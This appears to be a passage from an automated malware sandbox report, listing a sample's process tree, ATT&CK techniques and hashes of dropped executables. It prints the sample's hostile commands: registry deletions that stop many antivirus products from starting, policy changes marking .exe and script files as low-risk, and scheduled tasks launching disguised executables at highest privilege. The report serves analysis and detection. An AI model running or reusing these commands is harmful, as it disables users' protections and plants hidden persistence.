"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )4⤵
-
C:\Users\Admin\AppData\Local\Temp\C628.exeC:\Users\Admin\AppData\Local\Temp\C628.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\C628.exeC:\Users\Admin\AppData\Local\Temp\C628.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\CF70.exeC:\Users\Admin\AppData\Local\Temp\CF70.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\cheat.exe"C:\Users\Admin\AppData\Local\Temp\cheat.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\D25F.exeC:\Users\Admin\AppData\Local\Temp\D25F.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 7322⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 7482⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 6682⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 8882⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 7322⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\D399.exeC:\Users\Admin\AppData\Local\Temp\D399.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 7322⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 7482⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 8442⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 8922⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 8562⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\dhcpcmonitor\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\All Users\Mozilla\updates\308046B0AF4A39CB\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\ProgramData\Desktop\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\fajaeitC:\Users\Admin\AppData\Roaming\fajaeit1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
3Disabling Security Tools
1Virtualization/Sandbox Evasion
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\install.exeMD5
3319cb474eaa2f3812956b271ff29635
SHA174fbed926e8de14fa5eb6a5a47fb873def72fb81
SHA25679d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a
SHA512c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347
-
C:\ProgramData\Data\install.exeMD5
3319cb474eaa2f3812956b271ff29635
SHA174fbed926e8de14fa5eb6a5a47fb873def72fb81
SHA25679d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a
SHA512c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE14D.tmp.WERInternalMetadata.xmlMD5
8295dff0d171922fc63b36af8d5ded79
SHA1b71899da9a82a202cdfecf1b1e06bc9e042a930c
SHA25600616fe7b38654b63b8a039ac945eff9dd0cffbcd27546a6ddee58532f4c0325
SHA512ee7c51d00a49d417a9a0eceb26d38cb72ccbd4f1cf6e2bff33918578d3778ea8545d91c0dc6e8c505b5c93761198b8e62cf21ac9cbbaf81da17a5958821debf9
-
C:\ProgramData\Runtimebroker.exeMD5
62d1b104b14022206b559167d97f7007
SHA1cec380a9e863382fc1e37796f2f644a0dc3e3dbc
SHA2562917de6c13402e8ed00f0955929a5b131c1624f8261a077a135d08f01c1e71e5
SHA512821392e15527f511fa8d0568f5befdbbd10858ec50f400c868d36c062103a8a77bc4188050f954ec560c9f99d275feff9daa484372b379f90ed0c9070944a5d7
-
C:\ProgramData\Runtimebroker.exeMD5
62d1b104b14022206b559167d97f7007
SHA1cec380a9e863382fc1e37796f2f644a0dc3e3dbc
SHA2562917de6c13402e8ed00f0955929a5b131c1624f8261a077a135d08f01c1e71e5
SHA512821392e15527f511fa8d0568f5befdbbd10858ec50f400c868d36c062103a8a77bc4188050f954ec560c9f99d275feff9daa484372b379f90ed0c9070944a5d7
-
C:\ProgramData\Systemd\HostData.exeMD5
cbf26c74a0a12b5f17ba7596ff6ad19f
SHA16dc733432c290f1fbf5ddda2571b7f538445202b
SHA256095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983
SHA5128a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b
-
C:\ProgramData\Systemd\HostData.exeMD5
cbf26c74a0a12b5f17ba7596ff6ad19f
SHA16dc733432c290f1fbf5ddda2571b7f538445202b
SHA256095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983
SHA5128a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b
-
C:\ProgramData\Systemd\config.jsonMD5
a285ac140c8c6806223bfdc02302173e
SHA106ca61cae058c568860858e49615d04dc4a8820d
SHA25636d5713cc13ea15449ab8defc943e42cc657b503a79f0859600ea275598441eb
SHA512f82eae8304aa9ba504eba0e96468fdac08420b0e158c3263a4f47474b02fb5f751b1bd2335e71a33341d81a495083c7dd8e0479e2c48dbaf6a3f7fefb9f4054b
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
c558fdaa3884f969f1ec904ae7bbd991
SHA1b4f85d04f6bf061a17f52c264c065b786cfd33ff
SHA2563e2559b6ca355d011b05b1fcf35ed8b2375586fe6bb01bc367f24eb8ac82975e
SHA5126523c778fd9fab0085fafe7b4049e591403865212cc25109cb11f11584c7258bc15e0a5524d089d0f662151b22f3f8e6f871091cec57064c69a9a95903f9e7d4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
c8fb24a132990fc219bf4b9389aaca56
SHA1a40a89c7a2656769a6f92f9cc650695eadd02263
SHA2563e6db36517bda522a7f607b14c088bf5c8b88be7c7a16606e3cad64fcb9b6728
SHA5127389d43b6e3ccb9255ba219d965e5dddbf34a47e3714afde530c4e68d541ed690e1fe7c18bb6b515e7820ab11e474bdc1860243eb88e82c2c7a8038c621770f0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
f728dea87c5e5f116f544678b78c52a9
SHA1884dc3610641c7344d5988600b373f286639c50d
SHA2563643d4c5a065cf65ee34c509615866b8e3e4d71f3beb8711354e5e6a8ebee790
SHA512b8cf42bea9019b09a603aa697e69d2a74e997123d8fde3bd2f41876788705b357a063f48f144ea9b86330a9ebc5cf4096bd052530a5071a464a3b241710f5a07
-
C:\Users\Admin\AppData\Local\Temp\AEE3.exeMD5
a69e12607d01237460808fa1709e5e86
SHA14a12f82aee1c90e70cdf6be863ce1a749c8ae411
SHA256188e05efb42c1f7fdb5c910a6614f710a87ae642b23ac9ffe3f75246744865bc
SHA5127533e6da6bac0405fc8b608da8020b54b6ee02592e6fd40ea342e130a8a876ae5ef4a1fd636d95e76339dbf8be45cecbd22ca2d0a4635b055ffafec3d7e15284
-
C:\Users\Admin\AppData\Local\Temp\AEE3.exeMD5
a69e12607d01237460808fa1709e5e86
SHA14a12f82aee1c90e70cdf6be863ce1a749c8ae411
SHA256188e05efb42c1f7fdb5c910a6614f710a87ae642b23ac9ffe3f75246744865bc
SHA5127533e6da6bac0405fc8b608da8020b54b6ee02592e6fd40ea342e130a8a876ae5ef4a1fd636d95e76339dbf8be45cecbd22ca2d0a4635b055ffafec3d7e15284
-
C:\Users\Admin\AppData\Local\Temp\B472.exeMD5
e987477b0d14b6d7075f0105aa28ba92
SHA154bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
SHA2564fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
SHA512bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
-
C:\Users\Admin\AppData\Local\Temp\B472.exeMD5
e987477b0d14b6d7075f0105aa28ba92
SHA154bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
SHA2564fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
SHA512bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
-
C:\Users\Admin\AppData\Local\Temp\B472.exeMD5
e987477b0d14b6d7075f0105aa28ba92
SHA154bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
SHA2564fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
SHA512bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
-
C:\Users\Admin\AppData\Local\Temp\BD9B.exeMD5
49f58a80993170b4351014d0b5068897
SHA17af2615ec10821cbefb55c602b270c27fa1d6806
SHA256905f70426483e7dc4e4d2110cfa0f3a3bbac1ee16a74e287cd51cae0e0babd1c
SHA5122ee7f30ee68bbc9da4f3858d1eb188be3fca547f63b36864181b86a70ea5d06f614fdb38b42a22aff24e8d4d720f814b6b103e52d5c01c399eefd28775f88ae2
-
C:\Users\Admin\AppData\Local\Temp\BD9B.exeMD5
49f58a80993170b4351014d0b5068897
SHA17af2615ec10821cbefb55c602b270c27fa1d6806
SHA256905f70426483e7dc4e4d2110cfa0f3a3bbac1ee16a74e287cd51cae0e0babd1c
SHA5122ee7f30ee68bbc9da4f3858d1eb188be3fca547f63b36864181b86a70ea5d06f614fdb38b42a22aff24e8d4d720f814b6b103e52d5c01c399eefd28775f88ae2
-
C:\Users\Admin\AppData\Local\Temp\C1B3.exeMD5
62d1b104b14022206b559167d97f7007
SHA1cec380a9e863382fc1e37796f2f644a0dc3e3dbc
SHA2562917de6c13402e8ed00f0955929a5b131c1624f8261a077a135d08f01c1e71e5
SHA512821392e15527f511fa8d0568f5befdbbd10858ec50f400c868d36c062103a8a77bc4188050f954ec560c9f99d275feff9daa484372b379f90ed0c9070944a5d7
-
C:\Users\Admin\AppData\Local\Temp\C1B3.exeMD5
62d1b104b14022206b559167d97f7007
SHA1cec380a9e863382fc1e37796f2f644a0dc3e3dbc
SHA2562917de6c13402e8ed00f0955929a5b131c1624f8261a077a135d08f01c1e71e5
SHA512821392e15527f511fa8d0568f5befdbbd10858ec50f400c868d36c062103a8a77bc4188050f954ec560c9f99d275feff9daa484372b379f90ed0c9070944a5d7
-
C:\Users\Admin\AppData\Local\Temp\C628.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\C628.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\C628.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\CF70.exeMD5
68279fe4e69442ca2124d0758006a807
SHA17436d34654cee80938331ca13d90d7664e43ae94
SHA2569cafdd248a2ff56d3eecf414762b5d98b2d4583974ed66412b276177de3d674a
SHA5127bde7ae6d10cd2aa5deb854ad943e92db6b9ed27360337fd87f7646f6f4a356f94d6430f7ec2f0b352ec401d43dbd4e11cfbdb93c81058481b8389f521d2811d
-
C:\Users\Admin\AppData\Local\Temp\CF70.exeMD5
68279fe4e69442ca2124d0758006a807
SHA17436d34654cee80938331ca13d90d7664e43ae94
SHA2569cafdd248a2ff56d3eecf414762b5d98b2d4583974ed66412b276177de3d674a
SHA5127bde7ae6d10cd2aa5deb854ad943e92db6b9ed27360337fd87f7646f6f4a356f94d6430f7ec2f0b352ec401d43dbd4e11cfbdb93c81058481b8389f521d2811d
-
C:\Users\Admin\AppData\Local\Temp\D25F.exeMD5
4fb208ec7d17d1ba04dd724693231c5e
SHA1d2861fd7a1463d5bbbf6154d7c82d4dbff6112d5
SHA2566dfc2d77895bc8653a3a5ef24b97484ace1f716231abd88045e9e08fea2bd449
SHA512172aa75c8d4737e91d611af37bfeaa2ad4063f7a9d630215161db32a384d71d8852bbf7114369d8a886ad7eb966b20661e40db1599733e23da393bcfd04692a6
-
C:\Users\Admin\AppData\Local\Temp\D25F.exeMD5
4fb208ec7d17d1ba04dd724693231c5e
SHA1d2861fd7a1463d5bbbf6154d7c82d4dbff6112d5
